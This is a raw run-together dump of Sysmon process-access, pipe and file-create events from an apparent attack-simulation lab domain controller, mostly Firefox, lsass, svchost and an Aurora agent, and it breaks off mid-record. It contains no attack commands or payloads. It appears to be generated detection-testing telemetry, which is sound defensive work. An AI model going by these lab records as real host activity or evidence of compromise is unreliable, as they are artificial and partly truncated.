Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.395{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.395{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.394{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000042342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.392{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.2.172309186C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.382{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.363{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.362{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.338{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.338{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.338{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.298{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.298{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.298{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.297{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.297{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.297{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000042329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.179{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.179{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+b7b970|C:\Program Files\Mozilla Firefox\xul.dll+283bd30|C:\Program Files\Mozilla Firefox\xul.dll+25060b4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a9651a|C:\Program Files\Mozilla Firefox\xul.dll+17d2563|C:\Program Files\Mozilla Firefox\xul.dll+1a96c19|C:\Program Files\Mozilla Firefox\xul.dll+3bb937d|C:\Program Files\Mozilla Firefox\xul.dll+f87be3|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11b2c|C:\Program Files\Mozilla Firefox\xul.dll+193aa18|C:\Program Files\Mozilla Firefox\xul.dll+17e4953|C:\Program Files\Mozilla Firefox\xul.dll+1ac0339|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1 10341000x800000000000000042327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.147{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.147{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.1.194832155C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.138{FE4C2B44-E48F-63C7-3106-00000000AF02}32963564C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.138{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.123{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.123{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.123{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.123{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.123{FE4C2B44-E491-63C7-3206-00000000AF02}5212\chrome.3296.0.171059091C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000042318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.118{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\19865MD5=9201195A91F99706F51AA6F131D01F74,SHA256=D7CEABA48A47A92FCC2329BD8267CE41CEF8F6F56CE4AE440D3C57E664039722,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.103{FE4C2B44-E48F-63C7-3106-00000000AF02}32963564C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.103{FE4C2B44-E491-63C7-3206-00000000AF02}5212\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000042315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.103{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\cookies.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.101{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla 